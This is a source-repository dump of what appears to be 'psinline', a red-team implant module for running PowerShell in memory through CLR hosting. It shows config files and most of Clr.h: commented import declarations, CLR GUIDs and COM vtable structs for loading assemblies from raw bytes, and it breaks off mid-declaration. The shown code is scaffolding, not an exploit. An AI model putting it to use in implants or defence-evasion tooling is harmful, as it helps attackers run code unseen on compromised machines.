├── .gitignore ├── .gitmodules ├── .idea └── .gitignore ├── Clr.h ├── HwBpEngine.h ├── HwBpExceptions.h ├── MakeFile ├── Native.h ├── README.md ├── badger_exports.h ├── common.h ├── psinline.c ├── psinline.h └── utils.h /.gitignore: -------------------------------------------------------------------------------- 1 | /cmake-build-debug/ 2 | /.idea/ -------------------------------------------------------------------------------- /.gitmodules: -------------------------------------------------------------------------------- 1 | [submodule "PS"] 2 | path = PS 3 | url = https://github.com/MrAle98/PS 4 | -------------------------------------------------------------------------------- /.idea/.gitignore: -------------------------------------------------------------------------------- 1 | # Default ignored files 2 | /shelf/ 3 | /workspace.xml 4 | # Editor-based HTTP Client requests 5 | /httpRequests/ 6 | # Datasource local storage ignored files 7 | /dataSources/ 8 | /dataSources.local.xml 9 | /cmake-build-debug/ -------------------------------------------------------------------------------- /Clr.h: -------------------------------------------------------------------------------- 1 | // 2 | // Created by kali on 20/09/23. 3 | // 4 | 5 | #ifndef PSINLINE_CLR_H 6 | #define PSINLINE_CLR_H 7 | #pragma once 8 | #include 9 | 10 | ///*BOF Defs*/ 11 | //#define intAlloc(size) KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, size) 12 | // 13 | ////MSVCRT 14 | //WINBASEAPI void* WINAPI MSVCRT$malloc(SIZE_T); 15 | //WINBASEAPI void* __cdecl MSVCRT$memcpy(void* __restrict _Dst, const void* __restrict _Src, size_t _MaxCount); 16 | //WINBASEAPI void __cdecl MSVCRT$memset(void* dest, int c, size_t count); 17 | //WINBASEAPI int __cdecl MSVCRT$strcmp(const char* _Str1, const char* _Str2); 18 | //WINBASEAPI SIZE_T WINAPI MSVCRT$strlen(const char* str); 19 | //WINBASEAPI int __cdecl MSVCRT$_snprintf(char* s, size_t n, const char* fmt, ...); 20 | //WINBASEAPI errno_t __cdecl MSVCRT$mbstowcs_s(size_t* pReturnValue, wchar_t* wcstr, size_t sizeInWords, const char* mbstr, size_t count); 21 | //WINBASEAPI size_t __cdecl MSVCRT$wcslen(const wchar_t *_Str); 22 | //WINBASEAPI char* WINAPI MSVCRT$_strlwr(char * str); 23 | //WINBASEAPI char* WINAPI MSVCRT$strrchr(char * str); 24 | //WINBASEAPI int __cdecl MSVCRT$_open_osfhandle (intptr_t osfhandle, int flags); 25 | //WINBASEAPI int __cdecl MSVCRT$_dup2( int fd1, int fd2 ); 26 | //WINBASEAPI int __cdecl MSVCRT$_close(int fd); 27 | ////KERNEL32 28 | //WINBASEAPI HANDLE WINAPI KERNEL32$GetProcessHeap(); 29 | //WINBASEAPI void * WINAPI KERNEL32$HeapAlloc (HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes); 30 | //WINBASEAPI int WINAPI KERNEL32$lstrlenA(LPCSTR lpString); 31 | //WINBASEAPI HANDLE WINAPI KERNEL32$CreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile); 32 | //WINBASEAPI HANDLE WINAPI KERNEL32$CreateMailslotA(LPCSTR lpName, DWORD nMaxMessageSize, DWORD lReadTimeout, LPSECURITY_ATTRIBUTES lpSecurityAttributes); 33 | //WINBASEAPI BOOL WINAPI KERNEL32$GetMailslotInfo(HANDLE hMailslot, LPDWORD lpMaxMessageSize, LPDWORD lpNextSize, LPDWORD lpMessageCount, LPDWORD lpReadTimeout); 34 | //WINBASEAPI BOOL WINAPI KERNEL32$ReadFile(HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped); 35 | //WINBASEAPI HANDLE WINAPI KERNEL32$CreateEventA(LPSECURITY_ATTRIBUTES lpEventAttributes, BOOL bManualReset, BOOL bInitialState, LPCSTR lpName); 36 | //DECLSPEC_IMPORT HGLOBAL KERNEL32$GlobalAlloc(UINT uFlags, SIZE_T dwBytes); 37 | //DECLSPEC_IMPORT HGLOBAL KERNEL32$GlobalFree(HGLOBAL hMem); 38 | //DECLSPEC_IMPORT BOOL WINAPI KERNEL32$VirtualProtect (PVOID, DWORD, DWORD, PDWORD); 39 | ////SHELL32 40 | //WINBASEAPI LPWSTR* WINAPI SHELL32$CommandLineToArgvW(LPCWSTR lpCmdLine, int* pNumArgs); 41 | ////MSCOREE 42 | //WINBASEAPI HRESULT WINAPI MSCOREE$CLRCreateInstance(REFCLSID clsid, REFIID riid, LPVOID* ppInterface); 43 | ////OLEAUT32 44 | //WINBASEAPI SAFEARRAY* WINAPI OLEAUT32$SafeArrayCreateVector(VARTYPE vt, LONG lLbound, ULONG cElements); 45 | //WINBASEAPI SAFEARRAY* WINAPI OLEAUT32$SafeArrayCreate(VARTYPE vt, UINT cDims, SAFEARRAYBOUND* rgsabound); 46 | //WINBASEAPI HRESULT WINAPI OLEAUT32$SafeArrayAccessData(SAFEARRAY* psa, void HUGEP** ppvData); 47 | //WINBASEAPI HRESULT WINAPI OLEAUT32$SafeArrayUnaccessData(SAFEARRAY* psa); 48 | //WINBASEAPI HRESULT WINAPI OLEAUT32$SafeArrayPutElement(SAFEARRAY* psa, LONG* rgIndices, void* pv); 49 | //WINBASEAPI HRESULT WINAPI OLEAUT32$SafeArrayDestroy(SAFEARRAY* psa); 50 | //WINBASEAPI HRESULT WINAPI OLEAUT32$VariantClear(VARIANTARG* pvarg); 51 | //WINBASEAPI BSTR WINAPI OLEAUT32$SysAllocString(const OLECHAR* psz); 52 | // 53 | //#define intZeroMemory(addr,size) memset((addr),0,size) 54 | //#define intAlloc(size) KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, size) 55 | //#define memset MSVCRT$memset 56 | //#define stdout (__acrt_iob_func(1)) 57 | //#define STATUS_SUCCESS 0 58 | //#define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 ) 59 | 60 | /*GetProcAddess Pointers*/ 61 | //typedef DWORD (WINAPI* _GetCurrentProcessId) (void); 62 | //typedef BOOL (WINAPI* _AttachConsole) (DWORD dwProcessId); 63 | //typedef BOOL (WINAPI* _AllocConsole) (void); 64 | //typedef HWND (WINAPI* _GetConsoleWindow) (void); 65 | //typedef BOOL (WINAPI* _ShowWindow) (HWND hWnd, int nCmdShow); 66 | //typedef BOOL (WINAPI* _FreeConsole) (void); 67 | //typedef BOOL (WINAPI* _SetStdHandle) (DWORD nStdHandle, HANDLE hHandle); 68 | //typedef HANDLE (WINAPI* _GetStdHandle) (DWORD nStdHandle); 69 | //typedef BOOL (WINAPI* _CloseHandle) (HANDLE hObject); 70 | //typedef _Post_equals_last_error_ DWORD (WINAPI* _GetLastError) (void); 71 | //typedef int (WINAPI* _WideCharToMultiByte) (UINT CodePage, DWORD dwFlags, _In_NLS_string_(cchWideChar)LPCWCH lpWideCharStr, int cchWideChar, LPSTR lpMultiByteStr, int cbMultiByte, LPCCH lpDefaultChar, LPBOOL lpUsedDefaultChar); 72 | //typedef LPVOID (WINAPI* _CoTaskMemAlloc) (SIZE_T cb); 73 | //typedef LPVOID (WINAPI* _CoTaskMemFree) (LPVOID pv); 74 | //typedef HANDLE (WINAPI* _CreateNamedPipeA) (LPCSTR lpName, DWORD dwOpenMode, DWORD dwPipeMode, DWORD nMaxInstances, DWORD nOutBufferSize, DWORD nInBufferSize, DWORD nDefaultTimeOut, LPSECURITY_ATTRIBUTES lpSecurityAttributes); 75 | //typedef NTSTATUS(NTAPI* _NtWriteVirtualMemory)(HANDLE, PVOID, PVOID, ULONG, PULONG);//NtWriteVirtualMemory 76 | //typedef NTSTATUS(NTAPI* _NtProtectVirtualMemory)(HANDLE, PVOID, PULONG, ULONG, PULONG);//NtProtectVirtualMemory 77 | 78 | /*CLR GUIDS, Stucts -> Mostly from https://github.com/TheWover/donut*/ 79 | static GUID xIID_AppDomain = { 80 | 0x05F696DC, 0x2B29, 0x3663, {0xAD, 0x8B, 0xC4,0x38, 0x9C, 0xF2, 0xA7, 0x13} }; 81 | 82 | static GUID xCLSID_CLRMetaHost = { 83 | 0x9280188d, 0xe8e, 0x4867, {0xb3, 0xc, 0x7f, 0xa8, 0x38, 0x84, 0xe8, 0xde} }; 84 | 85 | static GUID xIID_ICLRMetaHost = { 86 | 0xD332DB9E, 0xB9B3, 0x4125, {0x82, 0x07, 0xA1, 0x48, 0x84, 0xF5, 0x32, 0x16} }; 87 | 88 | static GUID xIID_ICLRRuntimeInfo = { 89 | 0xBD39D1D2, 0xBA2F, 0x486a, {0x89, 0xB0, 0xB4, 0xB0, 0xCB, 0x46, 0x68, 0x91} }; 90 | 91 | static GUID xIID_ICorRuntimeHost = { 92 | 0xcb2f6722, 0xab3a, 0x11d2, {0x9c, 0x40, 0x00, 0xc0, 0x4f, 0xa3, 0x0a, 0x3e} }; 93 | 94 | static GUID xCLSID_CorRuntimeHost = { 95 | 0xcb2f6723, 0xab3a, 0x11d2, {0x9c, 0x40, 0x00, 0xc0, 0x4f, 0xa3, 0x0a, 0x3e} }; 96 | 97 | 98 | GUID xIID_IUnknown; 99 | GUID xIID_IDispatch; 100 | 101 | 102 | typedef struct _ICLRMetaHost ICLRMetaHost; 103 | typedef struct _ICLRRuntimeInfo ICLRRuntimeInfo; 104 | typedef struct _ICorRuntimeHost ICorRuntimeHost; 105 | typedef struct _ICorConfiguration ICorConfiguration; 106 | typedef struct _IGCThreadControl IGCThreadControl; 107 | typedef struct _IGCHostControl IGCHostControl; 108 | typedef struct _IDebuggerThreadControl IDebuggerThreadControl; 109 | typedef struct _AppDomain IAppDomain; 110 | typedef struct _Assembly IAssembly; 111 | typedef struct _Type IType; 112 | typedef struct _Binder IBinder; 113 | typedef struct _MethodInfo IMethodInfo; 114 | 115 | typedef void* HDOMAINENUM; 116 | 117 | typedef HRESULT(__stdcall* CLRCreateInstanceFnPtr)( 118 | REFCLSID clsid, 119 | REFIID riid, 120 | LPVOID* ppInterface); 121 | 122 | typedef HRESULT(__stdcall* CreateInterfaceFnPtr)( 123 | REFCLSID clsid, 124 | REFIID riid, 125 | LPVOID* ppInterface); 126 | 127 | 128 | typedef HRESULT(__stdcall* CallbackThreadSetFnPtr)(void); 129 | 130 | typedef HRESULT(__stdcall* CallbackThreadUnsetFnPtr)(void); 131 | 132 | typedef void(__stdcall* RuntimeLoadedCallbackFnPtr)( 133 | ICLRRuntimeInfo* pRuntimeInfo, 134 | CallbackThreadSetFnPtr pfnCallbackThreadSet, 135 | CallbackThreadUnsetFnPtr pfnCallbackThreadUnset); 136 | 137 | #undef DUMMY_METHOD 138 | #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IBinder *This) 139 | 140 | typedef struct _BinderVtbl { 141 | HRESULT(STDMETHODCALLTYPE* QueryInterface)( 142 | IBinder* This, 143 | /* [in] */ REFIID riid, 144 | /* [iid_is][out] */ void** ppvObject); 145 | 146 | ULONG(STDMETHODCALLTYPE* AddRef)( 147 | IBinder* This); 148 | 149 | ULONG(STDMETHODCALLTYPE* Release)( 150 | IBinder* This); 151 | 152 | DUMMY_METHOD(GetTypeInfoCount); 153 | DUMMY_METHOD(GetTypeInfo); 154 | DUMMY_METHOD(GetIDsOfNames); 155 | DUMMY_METHOD(Invoke); 156 | DUMMY_METHOD(ToString); 157 | DUMMY_METHOD(Equals); 158 | DUMMY_METHOD(GetHashCode); 159 | DUMMY_METHOD(GetType); 160 | DUMMY_METHOD(BindToMethod); 161 | DUMMY_METHOD(BindToField); 162 | DUMMY_METHOD(SelectMethod); 163 | DUMMY_METHOD(SelectProperty); 164 | DUMMY_METHOD(ChangeType); 165 | DUMMY_METHOD(ReorderArgumentArray); 166 | } BinderVtbl; 167 | 168 | typedef struct _Binder { 169 | BinderVtbl* lpVtbl; 170 | } Binder; 171 | 172 | #undef DUMMY_METHOD 173 | #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IAppDomain *This) 174 | 175 | typedef struct _AppDomainVtbl { 176 | BEGIN_INTERFACE 177 | 178 | HRESULT(STDMETHODCALLTYPE* QueryInterface)( 179 | IAppDomain* This, 180 | /* [in] */ REFIID riid, 181 | /* [iid_is][out] */ void** ppvObject); 182 | 183 | ULONG(STDMETHODCALLTYPE* AddRef)( 184 | IAppDomain* This); 185 | 186 | ULONG(STDMETHODCALLTYPE* Release)( 187 | IAppDomain* This); 188 | 189 | DUMMY_METHOD(GetTypeInfoCount); 190 | DUMMY_METHOD(GetTypeInfo); 191 | DUMMY_METHOD(GetIDsOfNames); 192 | DUMMY_METHOD(Invoke); 193 | 194 | DUMMY_METHOD(ToString); 195 | DUMMY_METHOD(Equals); 196 | DUMMY_METHOD(GetHashCode); 197 | DUMMY_METHOD(GetType); 198 | DUMMY_METHOD(InitializeLifetimeService); 199 | DUMMY_METHOD(GetLifetimeService); 200 | DUMMY_METHOD(Evidence); 201 | DUMMY_METHOD(add_DomainUnload); 202 | DUMMY_METHOD(remove_DomainUnload); 203 | DUMMY_METHOD(add_AssemblyLoad); 204 | DUMMY_METHOD(remove_AssemblyLoad); 205 | DUMMY_METHOD(add_ProcessExit); 206 | DUMMY_METHOD(remove_ProcessExit); 207 | DUMMY_METHOD(add_TypeResolve); 208 | DUMMY_METHOD(remove_TypeResolve); 209 | DUMMY_METHOD(add_ResourceResolve); 210 | DUMMY_METHOD(remove_ResourceResolve); 211 | DUMMY_METHOD(add_AssemblyResolve); 212 | DUMMY_METHOD(remove_AssemblyResolve); 213 | DUMMY_METHOD(add_UnhandledException); 214 | DUMMY_METHOD(remove_UnhandledException); 215 | DUMMY_METHOD(DefineDynamicAssembly); 216 | DUMMY_METHOD(DefineDynamicAssembly_2); 217 | DUMMY_METHOD(DefineDynamicAssembly_3); 218 | DUMMY_METHOD(DefineDynamicAssembly_4); 219 | DUMMY_METHOD(DefineDynamicAssembly_5); 220 | DUMMY_METHOD(DefineDynamicAssembly_6); 221 | DUMMY_METHOD(DefineDynamicAssembly_7); 222 | DUMMY_METHOD(DefineDynamicAssembly_8); 223 | DUMMY_METHOD(DefineDynamicAssembly_9); 224 | DUMMY_METHOD(CreateInstance); 225 | DUMMY_METHOD(CreateInstanceFrom); 226 | DUMMY_METHOD(CreateInstance_2); 227 | DUMMY_METHOD(CreateInstanceFrom_2); 228 | DUMMY_METHOD(CreateInstance_3); 229 | DUMMY_METHOD(CreateInstanceFrom_3); 230 | DUMMY_METHOD(Load); 231 | DUMMY_METHOD(Load_2); 232 | 233 | HRESULT(STDMETHODCALLTYPE* Load_3)( 234 | IAppDomain* This, 235 | SAFEARRAY* rawAssembly, 236 | IAssembly** pRetVal); 237 | 238 | DUMMY_METHOD(Load_4); 239 | DUMMY_METHOD(Load_5); 240 | DUMMY_METHOD(Load_6); 241 | DUMMY_METHOD(Load_7); 242 | DUMMY_METHOD(ExecuteAssembly); 243 | DUMMY_METHOD(ExecuteAssembly_2); 244 | DUMMY_METHOD(ExecuteAssembly_3); 245 | DUMMY_METHOD(FriendlyName); 246 | DUMMY_METHOD(BaseDirectory); 247 | DUMMY_METHOD(RelativeSearchPath); 248 | DUMMY_METHOD(ShadowCopyFiles); 249 | DUMMY_METHOD(GetAssemblies); 250 | DUMMY_METHOD(AppendPrivatePath); 251 | DUMMY_METHOD(ClearPrivatePath); 252 | DUMMY_METHOD(SetShadowCopyPath); 253 | DUMMY_METHOD(ClearShadowCopyPath); 254 | DUMMY_METHOD(SetCachePath); 255 | DUMMY_METHOD(SetData); 256 | DUMMY_METHOD(GetData); 257 | DUMMY_METHOD(SetAppDomainPolicy); 258 | DUMMY_METHOD(SetThreadPrincipal); 259 | DUMMY_METHOD(SetPrincipalPolicy); 260 | DUMMY_METHOD(DoCallBack); 261 | DUMMY_METHOD(DynamicDirectory); 262 | 263 | END_INTERFACE 264 | } AppDomainVtbl; 265 | 266 | typedef struct _AppDomain { 267 | AppDomainVtbl* lpVtbl; 268 | } AppDomain; 269 | 270 | #undef DUMMY_METHOD 271 | #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IAssembly *This) 272 | 273 | typedef struct _AssemblyVtbl { 274 | BEGIN_INTERFACE 275 | 276 | HRESULT(STDMETHODCALLTYPE* QueryInterface)( 277 | IAssembly* This, 278 | REFIID riid, 279 | void** ppvObject); 280 | 281 | ULONG(STDMETHODCALLTYPE* AddRef)( 282 | IAssembly* This); 283 | 284 | ULONG(STDMETHODCALLTYPE* Release)( 285 | IAssembly* This); 286 | 287 | DUMMY_METHOD(GetTypeInfoCount); 288 | DUMMY_METHOD(GetTypeInfo); 289 | DUMMY_METHOD(GetIDsOfNames); 290 | 291 | DUMMY_METHOD(Invoke); 292 | DUMMY_METHOD(ToString); 293 | DUMMY_METHOD(Equals); 294 | DUMMY_METHOD(GetHashCode); 295 | DUMMY_METHOD(GetType); 296 | DUMMY_METHOD(CodeBase); 297 | DUMMY_METHOD(EscapedCodeBase); 298 | DUMMY_METHOD(GetName); 299 | DUMMY_METHOD(GetName_2); 300 | DUMMY_METHOD(FullName); 301 | 302 | HRESULT(STDMETHODCALLTYPE* EntryPoint)( 303 | IAssembly* This, 304 | IMethodInfo** pRetVal); 305 | 306 | HRESULT(STDMETHODCALLTYPE* GetType_2)( 307 | IAssembly* This, 308 | BSTR name, 309 | IType** pRetVal); 310 | 311 | DUMMY_METHOD(GetType_3); 312 | DUMMY_METHOD(GetExportedTypes); 313 | DUMMY_METHOD(GetTypes); 314 | DUMMY_METHOD(GetManifestResourceStream); 315 | DUMMY_METHOD(GetManifestResourceStream_2); 316 | DUMMY_METHOD(GetFile); 317 | DUMMY_METHOD(GetFiles); 318 | DUMMY_METHOD(GetFiles_2); 319 | DUMMY_METHOD(GetManifestResourceNames); 320 | DUMMY_METHOD(GetManifestResourceInfo); 321 | DUMMY_METHOD(Location); 322 | DUMMY_METHOD(Evidence); 323 | DUMMY_METHOD(GetCustomAttributes); 324 | DUMMY_METHOD(GetCustomAttributes_2); 325 | DUMMY_METHOD(IsDefined); 326 | DUMMY_METHOD(GetObjectData); 327 | DUMMY_METHOD(add_ModuleResolve); 328 | DUMMY_METHOD(remove_ModuleResolve); 329 | DUMMY_METHOD(GetType_4); 330 | DUMMY_METHOD(GetSatelliteAssembly); 331 | DUMMY_METHOD(GetSatelliteAssembly_2); 332 | DUMMY_METHOD(LoadModule); 333 | DUMMY_METHOD(LoadModule_2); 334 | DUMMY_METHOD(CreateInstance); 335 | DUMMY_METHOD(CreateInstance_2); 336 | DUMMY_METHOD(CreateInstance_3); 337 | DUMMY_METHOD(GetLoadedModules); 338 | DUMMY_METHOD(GetLoadedModules_2); 339 | DUMMY_METHOD(GetModules); 340 | DUMMY_METHOD(GetModules_2); 341 | DUMMY_METHOD(GetModule); 342 | DUMMY_METHOD(GetReferencedAssemblies); 343 | DUMMY_METHOD(GlobalAssemblyCache); 344 | 345 | END_INTERFACE 346 | } AssemblyVtbl; 347 | 348 | typedef enum _BindingFlags { 349 | BindingFlags_Default = 0, 350 | BindingFlags_IgnoreCase = 1, 351 | BindingFlags_DeclaredOnly = 2, 352 | BindingFlags_Instance = 4, 353 | BindingFlags_Static = 8, 354 | BindingFlags_Public = 16, 355 | BindingFlags_NonPublic = 32, 356 | BindingFlags_FlattenHierarchy = 64, 357 | BindingFlags_InvokeMethod = 256, 358 | BindingFlags_CreateInstance = 512, 359 | BindingFlags_GetField = 1024, 360 | BindingFlags_SetField = 2048, 361 | BindingFlags_GetProperty = 4096, 362 | BindingFlags_SetProperty = 8192, 363 | BindingFlags_PutDispProperty = 16384, 364 | BindingFlags_PutRefDispProperty = 32768, 365 | BindingFlags_ExactBinding = 65536, 366 | BindingFlags_SuppressChangeType = 131072, 367 | BindingFlags_OptionalParamBinding = 262144, 368 | BindingFlags_IgnoreReturn = 16777216 369 | } BindingFlags; 370 | 371 | typedef struct _Assembly { 372 | AssemblyVtbl* lpVtbl; 373 | } Assembly; 374 | 375 | #undef DUMMY_METHOD 376 | #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IType *This) 377 | 378 | typedef struct _TypeVtbl { 379 | BEGIN_INTERFACE 380 | 381 | HRESULT(STDMETHODCALLTYPE* QueryInterface)( 382 | IType* This, 383 | REFIID riid, 384 | void** ppvObject); 385 | 386 | ULONG(STDMETHODCALLTYPE* AddRef)( 387 | IType* This); 388 | 389 | ULONG(STDMETHODCALLTYPE* Release)( 390 | IType* This); 391 | 392 | DUMMY_METHOD(GetTypeInfoCount); 393 | DUMMY_METHOD(GetTypeInfo); 394 | DUMMY_METHOD(GetIDsOfNames); 395 | DUMMY_METHOD(Invoke); 396 | 397 | DUMMY_METHOD(ToString); 398 | DUMMY_METHOD(Equals); 399 | DUMMY_METHOD(GetHashCode); 400 | DUMMY_METHOD(GetType); 401 | DUMMY_METHOD(MemberType); 402 | DUMMY_METHOD(name); 403 | DUMMY_METHOD(DeclaringType); 404 | DUMMY_METHOD(ReflectedType); 405 | DUMMY_METHOD(GetCustomAttributes); 406 | DUMMY_METHOD(GetCustomAttributes_2); 407 | DUMMY_METHOD(IsDefined); 408 | DUMMY_METHOD(Guid); 409 | DUMMY_METHOD(Module); 410 | DUMMY_METHOD(Assembly); 411 | DUMMY_METHOD(TypeHandle); 412 | DUMMY_METHOD(FullName); 413 | DUMMY_METHOD(Namespace); 414 | DUMMY_METHOD(AssemblyQualifiedName); 415 | DUMMY_METHOD(GetArrayRank); 416 | DUMMY_METHOD(BaseType); 417 | DUMMY_METHOD(GetConstructors); 418 | DUMMY_METHOD(GetInterface); 419 | DUMMY_METHOD(GetInterfaces); 420 | DUMMY_METHOD(FindInterfaces); 421 | DUMMY_METHOD(GetEvent); 422 | DUMMY_METHOD(GetEvents); 423 | DUMMY_METHOD(GetEvents_2); 424 | DUMMY_METHOD(GetNestedTypes); 425 | DUMMY_METHOD(GetNestedType); 426 | DUMMY_METHOD(GetMember); 427 | DUMMY_METHOD(GetDefaultMembers); 428 | DUMMY_METHOD(FindMembers); 429 | DUMMY_METHOD(GetElementType); 430 | DUMMY_METHOD(IsSubclassOf); 431 | DUMMY_METHOD(IsInstanceOfType); 432 | DUMMY_METHOD(IsAssignableFrom); 433 | DUMMY_METHOD(GetInterfaceMap); 434 | DUMMY_METHOD(GetMethod); 435 | DUMMY_METHOD(GetMethod_2); 436 | DUMMY_METHOD(GetMethods); 437 | DUMMY_METHOD(GetField); 438 | DUMMY_METHOD(GetFields); 439 | DUMMY_METHOD(GetProperty); 440 | DUMMY_METHOD(GetProperty_2); 441 | DUMMY_METHOD(GetProperties); 442 | DUMMY_METHOD(GetMember_2); 443 | DUMMY_METHOD(GetMembers); 444 | DUMMY_METHOD(InvokeMember); 445 | DUMMY_METHOD(UnderlyingSystemType); 446 | DUMMY_METHOD(InvokeMember_2); 447 | 448 | HRESULT(STDMETHODCALLTYPE* InvokeMember_3)( 449 | IType* This, 450 | BSTR name, 451 | BindingFlags invokeAttr, 452 | IBinder* Binder, 453 | VARIANT Target, 454 | SAFEARRAY* args, 455 | VARIANT* pRetVal); 456 | 457 | DUMMY_METHOD(GetConstructor); 458 | DUMMY_METHOD(GetConstructor_2); 459 | DUMMY_METHOD(GetConstructor_3); 460 | DUMMY_METHOD(GetConstructors_2); 461 | DUMMY_METHOD(TypeInitializer); 462 | DUMMY_METHOD(GetMethod_3); 463 | DUMMY_METHOD(GetMethod_4); 464 | DUMMY_METHOD(GetMethod_5); 465 | DUMMY_METHOD(GetMethod_6); 466 | DUMMY_METHOD(GetMethods_2); 467 | DUMMY_METHOD(GetField_2); 468 | DUMMY_METHOD(GetFields_2); 469 | DUMMY_METHOD(GetInterface_2); 470 | DUMMY_METHOD(GetEvent_2); 471 | DUMMY_METHOD(GetProperty_3); 472 | DUMMY_METHOD(GetProperty_4); 473 | DUMMY_METHOD(GetProperty_5); 474 | DUMMY_METHOD(GetProperty_6); 475 | DUMMY_METHOD(GetProperty_7); 476 | DUMMY_METHOD(GetProperties_2); 477 | DUMMY_METHOD(GetNestedTypes_2); 478 | DUMMY_METHOD(GetNestedType_2); 479 | DUMMY_METHOD(GetMember_3); 480 | DUMMY_METHOD(GetMembers_2); 481 | DUMMY_METHOD(Attributes); 482 | DUMMY_METHOD(IsNotPublic); 483 | DUMMY_METHOD(IsPublic); 484 | DUMMY_METHOD(IsNestedPublic); 485 | DUMMY_METHOD(IsNestedPrivate); 486 | DUMMY_METHOD(IsNestedFamily); 487 | DUMMY_METHOD(IsNestedAssembly); 488 | DUMMY_METHOD(IsNestedFamANDAssem); 489 | DUMMY_METHOD(IsNestedFamORAssem); 490 | DUMMY_METHOD(IsAutoLayout); 491 | DUMMY_METHOD(IsLayoutSequential); 492 | DUMMY_METHOD(IsExplicitLayout); 493 | DUMMY_METHOD(IsClass); 494 | DUMMY_METHOD(IsInterface); 495 | DUMMY_METHOD(IsValueType); 496 | DUMMY_METHOD(IsAbstract); 497 | DUMMY_METHOD(IsSealed); 498 | DUMMY_METHOD(IsEnum); 499 | DUMMY_METHOD(IsSpecialName); 500 | DUMMY_METHOD(IsImport); 501 | DUMMY_METHOD(IsSerializable); 502 | DUMMY_METHOD(IsAnsiClass); 503 | DUMMY_METHOD(IsUnicodeClass); 504 | DUMMY_METHOD(IsAutoClass); 505 | DUMMY_METHOD(IsArray); 506 | DUMMY_METHOD(IsByRef); 507 | DUMMY_METHOD(IsPointer); 508 | DUMMY_METHOD(IsPrimitive); 509 | DUMMY_METHOD(IsCOMObject); 510 | DUMMY_METHOD(HasElementType); 511 | DUMMY_METHOD(IsContextful); 512 | DUMMY_METHOD(IsMarshalByRef); 513 | DUMMY_METHOD(Equals_2); 514 | 515 | END_INTERFACE 516 | } TypeVtbl; 517 | 518 | typedef struct ICLRRuntimeInfoVtbl 519 | { 520 | BEGIN_INTERFACE 521 | 522 | HRESULT(STDMETHODCALLTYPE* QueryInterface)( 523 | ICLRRuntimeInfo* This, 524 | /* [in] */ REFIID riid, 525 | /* [iid_is][out] */ 526 | __RPC__deref_out void** ppvObject); 527 | 528 | ULONG(STDMETHODCALLTYPE* AddRef)( 529 | ICLRRuntimeInfo* This); 530 | 531 | ULONG(STDMETHODCALLTYPE* Release)( 532 | ICLRRuntimeInfo* This); 533 | 534 | HRESULT(STDMETHODCALLTYPE* GetVersionString)( 535 | ICLRRuntimeInfo* This, 536 | /* [size_is][out] */ 537 | LPWSTR pwzBuffer, 538 | /* [out][in] */ DWORD* pcchBuffer); 539 | 540 | HRESULT(STDMETHODCALLTYPE* GetRuntimeDirectory)( 541 | ICLRRuntimeInfo* This, 542 | /* [size_is][out] */ 543 | __out_ecount_full(*pcchBuffer) LPWSTR pwzBuffer, 544 | /* [out][in] */ DWORD* pcchBuffer); 545 | 546 | HRESULT(STDMETHODCALLTYPE* IsLoaded)( 547 | ICLRRuntimeInfo* This, 548 | /* [in] */ HANDLE hndProcess, 549 | /* [retval][out] */ BOOL* pbLoaded); 550 | 551 | HRESULT(STDMETHODCALLTYPE* LoadErrorString)( 552 | ICLRRuntimeInfo* This, 553 | /* [in] */ UINT iResourceID, 554 | /* [size_is][out] */ 555 | __out_ecount_full(*pcchBuffer) LPWSTR pwzBuffer, 556 | /* [out][in] */ DWORD* pcchBuffer, 557 | /* [lcid][in] */ LONG iLocaleID); 558 | 559 | HRESULT(STDMETHODCALLTYPE* LoadLibrary)( 560 | ICLRRuntimeInfo* This, 561 | /* [in] */ LPCWSTR pwzDllName, 562 | /* [retval][out] */ HMODULE* phndModule); 563 | 564 | HRESULT(STDMETHODCALLTYPE* GetProcAddress)( 565 | ICLRRuntimeInfo* This, 566 | /* [in] */ LPCSTR pszProcName, 567 | /* [retval][out] */ LPVOID* ppProc); 568 | 569 | HRESULT(STDMETHODCALLTYPE* GetInterface)( 570 | ICLRRuntimeInfo* This, 571 | /* [in] */ REFCLSID rclsid, 572 | /* [in] */ REFIID riid, 573 | /* [retval][iid_is][out] */ LPVOID* ppUnk); 574 | 575 | HRESULT(STDMETHODCALLTYPE* IsLoadable)( 576 | ICLRRuntimeInfo* This, 577 | /* [retval][out] */ BOOL* pbLoadable); 578 | 579 | HRESULT(STDMETHODCALLTYPE* SetDefaultStartupFlags)( 580 | ICLRRuntimeInfo* This, 581 | /* [in] */ DWORD dwStartupFlags, 582 | /* [in] */ LPCWSTR pwzHostConfigFile); 583 | 584 | HRESULT(STDMETHODCALLTYPE* GetDefaultStartupFlags)( 585 | ICLRRuntimeInfo* This, 586 | /* [out] */ DWORD* pdwStartupFlags, 587 | /* [size_is][out] */ 588 | LPWSTR pwzHostConfigFile, 589 | /* [out][in] */ DWORD* pcchHostConfigFile); 590 | 591 | HRESULT(STDMETHODCALLTYPE* BindAsLegacyV2Runtime)( 592 | ICLRRuntimeInfo* This); 593 | 594 | HRESULT(STDMETHODCALLTYPE* IsStarted)( 595 | ICLRRuntimeInfo* This, 596 | /* [out] */ BOOL* pbStarted, 597 | /* [out] */ DWORD* pdwStartupFlags); 598 | 599 | END_INTERFACE 600 | } ICLRRuntimeInfoVtbl; 601 | 602 | typedef struct _ICLRRuntimeInfo { 603 | ICLRRuntimeInfoVtbl* lpVtbl; 604 | } ICLRRuntimeInfo; 605 | 606 | typedef struct _Type { 607 | TypeVtbl* lpVtbl; 608 | } Type; 609 | 610 | typedef struct ICLRMetaHostVtbl 611 | { 612 | BEGIN_INTERFACE 613 | 614 | HRESULT(STDMETHODCALLTYPE* QueryInterface)( 615 | ICLRMetaHost* This, 616 | /* [in] */ REFIID riid, 617 | /* [iid_is][out] */ 618 | __RPC__deref_out void** ppvObject); 619 | 620 | ULONG(STDMETHODCALLTYPE* AddRef)( 621 